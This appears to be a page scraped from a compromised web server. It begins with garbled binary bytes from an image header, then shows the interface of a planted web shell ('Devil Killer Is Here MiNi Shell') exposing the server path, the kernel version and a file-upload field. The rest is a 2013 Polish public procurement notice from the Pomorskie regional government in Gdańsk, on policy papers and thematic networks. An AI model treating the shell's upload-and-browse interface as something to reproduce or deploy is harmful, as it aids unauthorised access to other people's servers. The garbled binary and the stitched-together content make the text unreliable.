JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130311/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130311/96082-N-2013.html

<p class="kh_header"><b>Gdańsk: Przedmiotem zamówienia jest wykonanie obsługi merytorycznej Pomorskich Sieci Tematycznych oraz opracowanie 5 dokumentów typu policy paper w oparciu o efekty i wnioski z prac Pomorskich Sieci Tematycznych i z udziałem Pomorskiego Obserwatorium Procesów Adaptacyjnych  w ramach projektu systemowego Samorządu Województwa Pomorskiego pn. System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu</b><br>
<b>Numer ogłoszenia: 96082 - 2013; data zamieszczenia: 11.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie obsługi merytorycznej Pomorskich Sieci Tematycznych oraz opracowanie 5 dokumentów typu policy paper w oparciu o efekty i wnioski z prac Pomorskich Sieci Tematycznych i z udziałem Pomorskiego Obserwatorium Procesów Adaptacyjnych  w ramach projektu systemowego Samorządu Województwa Pomorskiego pn. System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> §1. Przedmiotem zamówienia jest wykonanie obsługi merytorycznej Pomorskich Sieci Tematycznych oraz opracowanie 5 dokumentów typu policy paper w oparciu o efekty i wnioski z prac Pomorskich Sieci Tematycznych i z udziałem Pomorskiego Obserwatorium Procesów Adaptacyjnych  w ramach projektu systemowego Samorządu Województwa Pomorskiego pn. System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu.
Szczegółowy opis przedmiotu zamówienia:
Zgodnie z Planem Działania dla Priorytetu VIII Programu Operacyjnego Kapitał Ludzki, przyjętym Uchwałą Nr 34 108 12 Zarządu Województwa Pomorskiego z dnia 5 stycznia 2012 roku w sprawie zatwierdzenia Planów Działania na rok 2012 dla Województwa Pomorskiego w ramach komponentu regionalnego Programu Operacyjnego Kapitał Ludzki PO KL, zmienioną Uchwałą Nr 398 136 12 Zarządu Województwa Pomorskiego z dnia 12 kwietnia 2012 roku, Uchwałą Nr 779 157 12 z dnia 3 lipca 2012 r. oraz Uchwałą Nr 1176 184 12 z dnia 3 października 2012 r., Departament Europejskiego Funduszu Społecznego został wskazany jako Beneficjent projektu systemowego w ramach Poddziałania 8.1.2 Wsparcie procesów adaptacyjnych i modernizacyjnych w regionie.
W dniu 11 października 2012 roku Zarząd Województwa Pomorskiego Uchwałą  Nr 1214 186 12 wyraził wolę przystąpienia do realizacji przewidzianego w Planie Działania na rok 2012 projektu systemowego System Inteligencji Regionalnej  kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu w ramach Poddziałania 8.1.2 PO KL 2007-2013. Następnie dnia 13 listopada 2012 roku Zarząd Województwa Pomorskiego podjął Uchwałę nr 1322 193 12 w sprawie zatwierdzenia projektu pt. System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 i przyznania dofinansowania na jego realizację oraz określenia praw i obowiązków Departamentu Europejskiego Funduszu Społecznego Urzędu Marszałkowskiego Województwa Pomorskiego jako Beneficjenta tego projektu.
W obliczu oddziałujących na rynek pracy negatywnych efektów procesów restrukturyzacyjnych oraz kolejnych możliwych dynamicznych zmian w tym obszarze, istotną kwestią dla efektywnego planowania wsparcia w obszarze zatrudnienia i adaptacyjności jest dysponowanie przez władze regionu aktualną wiedzą o kierunkach i zakresie potencjalnych przekształceń. Zjawiska kryzysowe, których negatywne oddziaływanie dotknęło gospodarkę województwa pomorskiego, w szczególności duże zakłady przemysłowe i produkcyjne, pokazały, że w odczytywaniu zagrożeń i kierunków zmian niewystarczające jest doraźne opieranie się na statystycznych modelach analiz społeczno - gospodarczych głównie na standardowych danych generowanych przez statystykę publiczną. Znaczna część problemów związanych z adaptacyjnością firm i pracowników w województwie pomorskim nie zostaje bowiem w ogóle bądź jest niewystarczająco odzwierciedlona w dostępnych statystykach. Zaktualizowana Strategia Rozwoju Województwa Pomorskiego 2020 wśród kluczowych kwestii związanych z adaptacyjnością w województwie pomorskim, które wymagają dalszych i pogłębionych analiz wymienia: niski poziom zatrudnienia i aktywności zawodowej; niską mobilność 
zawodową i przestrzenną mieszkańców; niską skuteczność oferty dla inwestorów zewnętrznych; niewykorzystany potencjał naukowy, niską efektywność współpracy sektora B R z gospodarką oraz słabo wykorzystany potencjał wsparcia przedsiębiorczości.
Jak wynika z raportu Regionalne systemy badań społecznych i gospodarczych możliwości i zasadność tworzenia na przykładzie województwa pomorskiego Gdańsk 2010  kolejnym problemem utrudniającym efektywne przeciwdziałanie negatywnym zmianom gospodarczym jest brak spójnego i jednolitego systemu badań i analiz gospodarczych, a co za tym idzie brak zintegrowanego źródła przetwarzania informacji i danych służących za podstawę do podejmowania decyzji w zakresie zarządzania zmianami gospodarczymi przez władze Samorządu Województwa Pomorskiego SWP. Potwierdza to analiza przeprowadzona przez SWP na potrzeby Ministerstwa Rozwoju Regionalnego w ramach prac nad utworzeniem w województwach Regionalnych Obserwatoriów Terytorialnych 2011, która wskazuje m.in. następujące problemy, dotyczące monitorowania zjawisk i zmian społeczno - gospodarczych w województwie pomorskim:
-brak dostępu do danych aktualnych i na odpowiednim poziomie agregacji - niezbędnym do potrzeb zarządzania rozwojem regionu, 
-brak przepływu danych i informacji pomiędzy jednostkami samorządowymi oraz instytucjami regionalnymi,
-osobne prowadzenie obserwatoriów tematycznych  w różnych instytucjach, w różny sposób, o różnym zakresie, nieciągłych czasowo,
-brak procedur i rozwiązań formalnych, obligujących jednostki samorządowe do współpracy i wymiany informacji.
Jak wynika z ww. zestawień wspólnym problemem w zakresie przewidywania i zarządzania zmianami gospodarczymi jest brak mechanizmów realizacji badań wdrożeniowych i syntezy wniosków z takich działań na poziomie regionalnym. Ze względu na dynamikę zmian i wielowymiarowość zjawisk społecznych i gospodarczych działania realizowane w tym zakresie muszą mieć charakter skoordynowany, ale jednocześnie sieciowy i otwarty. Żaden ekspert ani żadna instytucja nie jest w stanie tej roli spełnić samodzielnie. W związku z tym, jak wynika z rekomendacji z raportu System Inteligencji Regionalnej jako odpowiedź na wyzwania przyszłości Gdańsk 2011, na szczeblu regionalnym konieczne jest realizowanie przez SWP zintegrowanych i multidyscyplinarnych działań badawczych dotyczących zmian gospodarczych, opartych przy tym o wykorzystanie wiedzy i partycypację partnerów społeczno - gospodarczych. Taki system musi być w stanie przetwarzać informacje i wiedzę ilościową i jakościową w syntetyczne kompleksowe diagnozy i rekomendacje wdrożeniowe. Celem tak określonych prac analitycznych jest nadanie mierzalnego charakteru wynikom badań oraz określenie ich wpływu na działania podejmowane regionalnie w obszarze zmian gospodarczych i adaptacyjności. Weryfikacja trafności wniosków i rekomendacji zostanie zapewniona poprzez różne narzędzia partycypacyjne i partnerskie, włączające szerokie grono regionalnych aktorów społeczno - gospodarczych w tym praktyków i ekspertów w tworzenie polityki opartej na faktach. Jest to także istotne dla określenia w regionie kształtu interwencji ze środków UE w latach 2014-2020.
Narzędziem, które pozwoli odpowiedzieć na ww. problemy i potrzeby będzie sformułowana w ramach projektu koncepcja realizacji działań badawczo - analitycznych w ramach modelu Pomorskich Sieci Tematycznych PST i Pomorskiego Obserwatorium Procesów Adaptacyjnych POPA pod nazwą Systemu Inteligencji Regionalnej SIR. Dzięki realizacji działań badawczo - analitycznych w zaproponowanej formule Zarząd Województwa Pomorskiego uzyska narzędzie wspomagające realizację Strategii Rozwoju Województwa Pomorskiego 2020 SRWP 2020 oraz identyfikację kluczowych trendów adaptacyjnych i gospodarczych. 
Celem głównym projektu jest wzrost efektywności i skuteczności zarządzania regionalnymi zmianami gospodarczymi przez władze SWP poprzez wykorzystanie w okresie od 01.11.2012 r. do 31.05.2015 r. partycypacyjnego modelu narzędzi prognostycznych i informacyjnych SIR, generującego wymierne rezultaty analityczne i badawcze, wspierające proces realizacji SRWP 2020. 
Zakres działania Pomorskich Sieci Tematycznych PST, utworzonych w ramach projektu, wynika bezpośrednio z celów operacyjnych SRWP 2020, tj. 
- cel operacyjny 1.1 Wysoka efektywność przedsiębiorstw kierunki 1.1 - 1.5 stanowi obszar tematyczny działania PST ds. wysokiej efektywności przedsiębiorstw, 
- cel operacyjny 2.1 - Wysoki poziom zatrudnienia kierunki 2.1.1, 2.1.2 stanowi obszar tematyczny działania PST ds. wysokiego poziomu zatrudnienia, 
- cel operacyjny 2.1 - Wysoki poziom zatrudnienia kierunek 2.1.3 stanowi obszar tematyczny działania PST ds. wysokiej jakości kształcenia zawodowego i ustawicznego. 

§2. Przedmiot zamówienia obejmuje łącznie dwa segmenty:  
1.	Segment I: obsługa merytoryczna 3 Pomorskich Sieci Tematycznych zwanych dalej PST,  
2.	Segment II: opracowanie 5 dokumentów typu policy paper w oparciu o efekty i wnioski z prac Pomorskich Sieci Tematycznych i z udziałem Pomorskiego Obserwatorium Procesów Adaptacyjnych zwanego dalej  POPA w ramach projektu systemowego SWP pn. System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu, w celu pozyskania wiedzy na temat kierunków rozwoju Województwa Pomorskiego jako podstawy do decyzji Zarządu Województwa Pomorskiego.

§3. Segment I. OBSŁUGA MERYTORYCZNA POMORSKICH SIECI TEMATYCZNYCH 
1.	Szczegółowa charakterystyka PST. W ich skład w liczbie ok. 20 osób w jednej PST wejdą  w szczególności: reprezentanci organizacji pracodawców i pracobiorców, przedstawiciele samorządu gospodarczego, przedsiębiorcy, eksperci merytoryczni z danych dziedzin, przedstawiciele środowisk naukowych i akademickich, instytucji badawczych i analitycznych, reprezentanci instytucji rynku pracy, szkolnictwa zawodowego i ustawicznego, przedstawiciele firm szkoleniowych, przedstawiciele jednostek samorządu terytorialnego z regionu. Dodatkowo w posiedzeniach PST będą uczestniczyć przedstawiciele Urzędu Marszałkowskiego Województwa Pomorskiego. Do celów i zadań merytorycznych każdej PST należeć będzie:
1)	Prowadzenie dialogu i konsultacji w obrębie ekspertów i środowisk związanych z problemami adaptacyjności przedsiębiorstw i rynku pracy;
2)	Generowanie, w szczególności na potrzeby POPA, eksperckiej i praktycznej informacji na temat zjawisk, procesów i problemów związanych z adaptacyjnością pomorskiej gospodarki w obszarze właściwym dla zakresu prac danej PST;
3)	Identyfikacja bieżących i najistotniejszych trendówprocesów zjawisk i problemów społeczno - gospodarczych, związanych z adaptacyjnością pomorskich przedsiębiorstw i ich pracowników - w obszarach tematycznych danej PST;
4)	Wypracowanie wniosków do sprawozdań analitycznych sporządzanych po każdym posiedzeniu przez moderatora-eksperta PST, zawierających opis i analizę wybranego zagadnienia zjawiska procesu oraz rekomendacje i propozycje wskazujące na wagę priorytetowość danego problemu, ewentualną konieczność jego dalszej analizy i badania, potencjalne możliwości rozwiązania lub zniwelowania, 
w szczególności poprzez narzędzia i kompetencje pozostające w gestii SWP;
5)	Identyfikacja potrzeb w zakresie przedmiotu i zagadnień objętych analizami eksperckimi o charakterze sektorowym zlecanymi na potrzeby danej PST, które analizują wybrane aspekty problematyki pozostające w gestii danej PST;
6)	Systematyczne przekazywanie do POPA sprawozdań analitycznych z prac PST.
Formą aktywności każdej z trzech PST będą posiedzenia jej członków, z których każde zostanie podsumowane sporządzanym przez moderatora-eksperta PST protokołem z przebiegu dyskusji, jak również sprawozdaniem analitycznym, zawierającym opinie i rekomendacje eksperckie.
Liczba planowanych posiedzeń PST  po 5 posiedzeń dla każdej PST łącznie 15 posiedzeń dla 3 PST w okresie od kwietnia 2013 r. do grudnia 2014 r. oraz jedno wspólne dodatkowe posiedzenie wszystkich PST w pierwszym kwartale 2015 r., czyli łącznie 16 posiedzeń. Szczegółowe terminy poszczególnych posiedzeń zostaną określone przez moderatorów-ekspertów w porozumieniu z członkami każdej PST, zgodnie z ramowym harmonogramem projektu przygotowanym przez Zamawiającego. 
2.	Zamawiający zastrzega, że wszystkie PST zostaną utworzone przez SWP. Opracowanie całościowej, szczegółowej i ostatecznej koncepcji funkcjonowania PST, w tym obsługa organizacyjno - techniczna ich prac, jak również stworzenie i zapewnienie ich składu instytucjonalnego i osobowego nie są przedmiotem działań Wykonawcy.
3.	Przedmiotem niniejszego segmentu zamówienia jest moderowanie i koordynowanie prac merytorycznych trzech PST, działających w następujących obszarach związanych z adaptacyjnością przedsiębiorstw i ich pracowników w województwie pomorskim tj.:
1)	Pomorskiej Sieci Tematycznej ds. wysokiej efektywności przedsiębiorstw obejmuje kwestie: upowszechnianie innowacji w przedsiębiorstwach i transfer innowacji do gospodarki; wsparcie inicjatyw klastrowych i przedsięwzięć realizowanych przez klastry wsparcie ekspansji zagranicznej przedsiębiorstw; pozyskiwanie inwestycji zewnętrznych  zapewnianie dostępu do sieci szerokopasmowego Internetu, w tym sieci o bardzo wysokiej przepustowości,
2)	Pomorskiej Sieci Tematycznej ds. wysokiego poziomu zatrudnienia obejmuje kwestie: aktywizacja biernych zawodowo i bezrobotnych; wspieranie rozwoju mikro i małych przedsiębiorstw,
3)	Pomorskiej Sieci Tematycznej ds. wysokiej jakości kształcenia zawodowego i ustawicznego obejmuje kwestie: poprawa jakości ponadgimnazjalnego kształcenia zawodowego i kształcenia ustawicznego. 
4.	W zakresie niniejszego segmentu zamówienia do szczegółowych obowiązków Wykonawcy zamówienia należy:
1)	Zapewnienie na rzecz każdej z trzech PST, o których mowa w ust. 3 pracy trzech stałych moderatorów-ekspertów po jednym dla każdej PST, do zadań których należeć będzie:
a)	merytoryczna obsługa i nadzór nad funkcjonowaniem każdej z trzech istniejących PST poprzez:
- wybór i przygotowywanie w uzgodnieniu z Zamawiającym tematów i zagadnień poddanych dyskusji i analizie na danym posiedzeniu PST; 
- osobiste prowadzenie i moderowanie dyskusji w ramach poszczególnych posiedzeń PST w oparciu 
o wcześniej stworzone założenia;
- sporządzanie protokołów z przebiegu dyskusji w ramach każdego posiedzenia danej PST; 
- sporządzanie sprawozdań analitycznych z każdego posiedzenia danej PST, dotyczących tematyki danego posiedzenia oraz bazujących przede wszystkim na wypracowanych w jego trakcie ustaleniach i wnioskach w szczególności ujętych w treści podpisanych przez moderatora-eksperta i zaakceptowanych przez Zamawiającego protokołów z posiedzeń PST oraz opracowanych na potrzeby danego posiedzenia analizach eksperckich. Każdorazowo podpisany przez moderatora-eksperta i zaakceptowany przez Zamawiającego protokół z posiedzenia danej PST stanowi załącznik do sprawozdania analitycznego z danego posiedzenia PST. 
b)	udział we wszystkich posiedzeniach POPA organizowanych w okresie realizacji usługi, w tym prezentacja na każdym posiedzeniu POPA sprawozdania analitycznego z ostatniego posiedzenia danej PST.
c)	udział w przygotowaniu materiałów promocyjnych i upowszechniających rezultaty projektu, w szczególności w postaci wypowiedzi na temat wyników prac PST do filmu promocyjnego zaplanowanego do realizacji w ramach projektu. 
2)	Zapewnienie na potrzeby każdego z posiedzeń PST udziału ekspertów w tym spośród członków danej PST, sporządzających i prezentujących na forum PST analizy eksperckie w tematach zgodnych z zakresem prac PST i tematyką poszczególnych posiedzeń. Wykonawca jest zobowiązany do zapewnienia opracowania i zaprezentowania na każdym posiedzeniu PST min. 2 analiz eksperckich przez odrębnych ekspertów, tym samym każda analiza ekspercka jest prezentowana na forum PST przez jej autora. Wymogi względem analiz eksperckich określa ust. 6. 
5.Wymagania względem analiz eksperckich, o których mowa w ust. 4. pkt 2: 
1)	Analizy eksperckie, o których mowa w ust. 4. pkt 2) uwzględniać powinny obszary merytoryczne adekwatne do zakresu działania danej PST, tj. w odniesieniu do:
a)PST ds. wysokiej efektywności przedsiębiorstw obejmować powinny następujące kwestie: upowszechnianie innowacji w przedsiębiorstwach i transfer innowacji do gospodarki; wsparcie inicjatyw klastrowych i przedsięwzięć realizowanych przez klastry; wsparcie ekspansji zagranicznej przedsiębiorstw; pozyskiwanie inwestycji zewnętrznych; zapewnianie dostępu do sieci szerokopasmowego Internetu, w tym sieci o bardzo wysokiej przepustowości;
b)PST ds. wysokiego poziomu zatrudnienia obejmować powinny następujące kwestie: aktywizacja biernych zawodowo i bezrobotnych; wspieranie rozwoju mikro i małych przedsiębiorstw;
c)PST ds. wysokiej jakości kształcenia zawodowego i ustawicznego obejmować powinny następujące kwestie: poprawa jakości ponadgimnazjalnego kształcenia zawodowego i kształcenia ustawicznego.
2)	Wymagane obligatoryjnie minimum metodologiczne powyższych analiz eksperckich każdorazowo obejmuje analizę danych zastanych Desk research. 
3)	Tekst główny każdej analizy eksperckiej nie powinien liczyć więcej niż 15 stron i nie mniej niż 10 stron z wyłączeniem streszczenia i ewentualnych załączników, przyjmując średnio 2 300 znaków na stronę.
4)	Analiza ekspercka powinna mieć następującą strukturę:
a)	streszczenie najważniejsze wyniki analizy, wypunktowanie wniosków wraz z rekomendacjami;
b)	spis treści;
c)	wprowadzenie opis przedmiotu, głównych założeń i celów analizy eksperckiej;
d)	opis zastosowanej metodologii oraz źródła informacji wykorzystywane w analizie eksperckiej;
e)	opis wyników analizy eksperckiej oraz ich interpretację; 
f)	wnioski i powiązane z nimi rekomendacje, fakultatywnie proponowany sposób ich wdrożenia;
g)	załączniki (fakultatywnie).
5)	Wykonawca każdorazowo zobowiązany jest przesłać analizę ekspercką Zamawiającemu, celem weryfikacji spełniania wymogów o których mowa w pkt. 1) - 4). 
6)	W ramach realizacji zamówienia, w odniesieniu do wszystkich posiedzeń PST Wykonawca jest zobowiązany do pozyskania łącznie 48 analiz eksperckich.

§4.  Segment II OPRACOWANIE 5 DOKUMENTÓW TYPU POLICY PAPER W OPARCIU  O EFEKTY I WNIOSKI Z PRAC POMORSKICH SIECI TEMATYCZNYCH I Z UDZIAŁEM POMORSKIEGO OBSERWATORIUM PROCESÓW ADAPTACYJNYCH 
1.	Szczegółowa charakterystyka POPA.  
W skład POPA wejdą w szczególności:
1)	Ekspert odpowiadający za opracowanie dokumentów typu policy paper;
2)	Moderatorzy-eksperci PST;
3)	Przedstawiciele każdej z trzech PST - opcjonalnie, wg potrzeb;
4)	Członek Członkowie Zarządu Województwa Pomorskiego;
5)	Przedstawiciele (Dyrektorzy) poszczególnych, adekwatnych merytorycznie Departamentów UMWP;
6)	Przedstawiciele WUP w Gdańsku;
7)	Eksperci merytoryczni zapraszani fakultatywnie do udziału w poszczególnych posiedzeniach POPA - przedstawiciele środowisk naukowych i akademickich, instytucji badawczych i analitycznych - publicznych i niepublicznych.
Cele i zadania POPA:
1)	Głównym celem funkcjonowania POPA będzie tworzenie - w szczególności na bazie sprawozdań analitycznych i opinii przekazanych przez poszczególne PST - rekomendacji do formułowania polityk i działań SWP, dotyczących życia gospodarczego województwa pomorskiego w zakresie procesów adaptacyjnych przedsiębiorstw i ich pracowników; 
2)	Generowanie inspiracji i tematów dla merytorycznej debaty prowadzonej w ramach PST;
3)	Inspirowanie, formułowanie i zatwierdzanie tematów badań, a następnie wykorzystywanie w swej pracy (przy tworzeniu rekomendacji dla SWP) powstałych w ich wyniku opracowań i raportów analityczno - badawczych, dotyczących zagadnień związanych z adaptacyjnością przedsiębiorstw i zmianami gospodarczymi;

4)	Przyjęcie 4 dokumentów sektorowych typu policy paper zawierających konkretne rekomendacje wdrożeniowe dla władz szczebla regionalnego w zakresie adaptacyjności przedsiębiorstw i ich pracowników;
5)	Przyjęcie 1 dokumentu typu policy paper złożonego z rekomendacji dla władz regionalnych w zakresie programowania interwencji ze środków UE w obszarze zmian gospodarczych i adaptacyjności (ze szczególnym uwzględnieniem celów i priorytetów Strategii Europa 2020). 
Sposób i formy działania POPA:
1)	POPA będzie obradowała pod przewodnictwem powołanego do jej składu członka Zarządu Województwa Pomorskiego.
2)	Aktywność POPA będzie sprzężona i oparta o efekty prac PST poprzez fakt, iż ma ono za zadanie czerpać z opinii ich uczestników, a jednocześnie wskazywać - gdy zidentyfikuje taką konieczność - dodatkowe (poza wybranymi przez same PST) tematy dla merytorycznej debaty prowadzonej w ich ramach. 
3)	W ramach POPA będzie dokonywana analiza i weryfikacja zawartości sprawozdań analitycznych przygotowywanych i kierowanych kwartalnie do POPA przez każdą z PST. Na ich podstawie, jak również w oparciu o wyniki badań i analiz zleconych w oparciu o decyzję POPA oraz o konsultacje merytoryczne z pozostałymi członkami POPA, będą przygotowywane projekty dokumentów typu policy paper  zawierających rekomendacje działań dla Zarządu Województwa Pomorskiego (łącznie 5 dokumentów). 
4)	Dyskusje nad zawartością i projektami tych dokumentów będą prowadzone podczas posiedzeń członków POPA, która ostatecznie przyjmuje wszystkie dokumenty typu policy paper. 
2.	Zamawiający zastrzega, że POPA zostanie utworzone przez SWP. Opracowanie szczegółowej i ostatecznej koncepcji funkcjonowania POPA, w tym obsługa organizacyjno - techniczna jego prac, jak również stworzenie i zapewnienie jego składu instytucjonalnego i osobowego nie są przedmiotem działań Wykonawcy.
3.	Przedmiotem niniejszego segmentu zamówienia jest:
1)	opracowanie łącznie 4 dokumentów sektorowych typu policy paper, zawierających rekomendacje dla Zarządu Województwa Pomorskiego w zakresie adaptacyjności przedsiębiorstw i pracowników z Pomorza w ramach obszarów merytorycznych adekwatnych do zakresu działania danej PST, w tym:
- 2 dokumenty sektorowe typu policy paper dla PST dotyczącej wysokiej efektywności przedsiębiorstw (obejmuje kwestie: upowszechnianie innowacji w przedsiębiorstwach i transfer innowacji do gospodarki; wsparcie inicjatyw klastrowych i przedsięwzięć realizowanych przez klastry; wsparcie ekspansji zagranicznej przedsiębiorstw; pozyskiwanie inwestycji zewnętrznych; zapewnianie dostępu do sieci szerokopasmowego Internetu, w tym sieci o bardzo wysokiej przepustowości);
- 1 dokument sektorowy typu policy paper dla PST dotyczącej wysokiego poziomu zatrudnienia (obejmuje kwestie: aktywizacja biernych zawodowo i bezrobotnych; wspieranie rozwoju mikro i małych przedsiębiorstw);
- 1 dokument sektorowy typu policy paper dla PST dotyczącej wysokiej jakości kształcenia zawodowego i ustawicznego (obejmuje kwestie: poprawa jakości Ponadgimnazjalnego kształcenia zawodowego i kształcenia ustawicznego);
2)	opracowanie 1 dokumentu typu policy paper w zakresie wdrażania interwencji ze środków Unii Europejskiej w perspektywie 2014-2020 z uwzględnieniem kwestii zmian gospodarczych i adaptacyjności przedsiębiorstw i pracowników z województwa pomorskiego, ze szczególnym uwzględnieniem celów i priorytetów Strategii Europa 2020 oraz treści rozporządzeń UE, dotyczących polityki spójności na lata 2014 - 2020.
3)	opracowane przez Wykonawcę dokumenty sektorowe typu policy paper, o których mowa w pkt. 1) i 2) podlegać będą akceptacji POPA; 

4)	zapewnienie udziału min. 1 eksperta reprezentującego Wykonawcę (nie pełniącego jednocześnie funkcji moderatora-eksperta PST) w 5 posiedzeniach POPA, organizowanych w trakcie realizacji zlecenia. Ekspert jest zobowiązany do aktywnego uczestnictwa merytorycznego we wszystkich posiedzeniach POPA organizowanych w trakcie realizacji zlecenia oraz prezentacji założeń i ostatecznych wersji dokumentów typu policy paper.
